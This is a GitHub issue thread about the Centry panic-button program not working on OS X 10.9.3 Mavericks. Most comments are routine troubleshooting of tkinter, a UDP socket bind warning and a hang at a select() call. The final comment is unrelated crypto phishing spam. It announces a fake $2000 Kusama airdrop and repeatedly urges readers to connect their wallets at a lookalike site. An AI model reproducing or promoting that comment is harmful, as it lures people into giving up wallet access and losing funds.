### ISSUE TITLE
does not work on osx 10.9.3 mavericks ?

### ISSUE THREAD

**Issue by ghost** [0xPoly/Centry#6]
Tried with default python (2.7.5) , fails to find tkinter (locgical since Tkinter uppercase was before 3.x)
Tried with brew installed python 3.4.1 , just getting "WARNING: FAILED TO BIND TO UDP SOCKET." and nothing else
Tried with official installer installed python 3.4.1 , same warning and nothing happens

Am I missing something ?

**Comment by 0xPoly** [comment]
Are you running the panic button as root? Prefix the sudo command the see if it works.

Sorry, don't have a mavericks system to test on myself.

**Comment by ghost** [comment]
Yes of course , tried as root ... I saw there were some issues with tcl-tk on mavericks but those should be fixed too. I'm not sure what's "wrong" even when using a debugger ... I'm still looking into it.

**Comment by ghost** [comment]
I can confirm this does not work on other 10.9.3 mavericks systems ... I tried several.

The program does not go further than line 128:    result = select.select([s],[],[])

**Comment by codelou** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://polkadot.network/static/b118567894df0c230e8553f2d6ea8b83/image2.png)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)
